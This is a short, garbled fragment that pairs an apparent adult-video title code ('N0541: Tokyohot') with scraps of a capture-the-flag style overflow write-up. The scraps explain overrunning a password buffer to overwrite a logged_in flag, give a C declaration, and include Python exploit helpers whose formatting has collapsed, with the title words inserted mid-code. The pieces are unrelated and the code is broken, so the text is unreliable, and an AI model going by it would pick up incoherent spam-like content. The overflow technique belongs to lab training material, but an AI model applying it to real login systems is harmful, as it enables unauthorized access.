N0541: Tokyohot

Thus, an overflow of buf can overflow that user->pwd points to! By providing an over‑long password we can write past the allocated 0x80 bytes of pwd and reach the logged_in variable located at 0x603200 (example address).

user_t users[10]; int logged_in = 0;

def get_flag(s): menu(s) s.sendall(b'3\n') flag = recvuntil(s, b'\n') print(flag.decode()) tokyohot n0541

def menu(s): recvuntil(s, b'> ')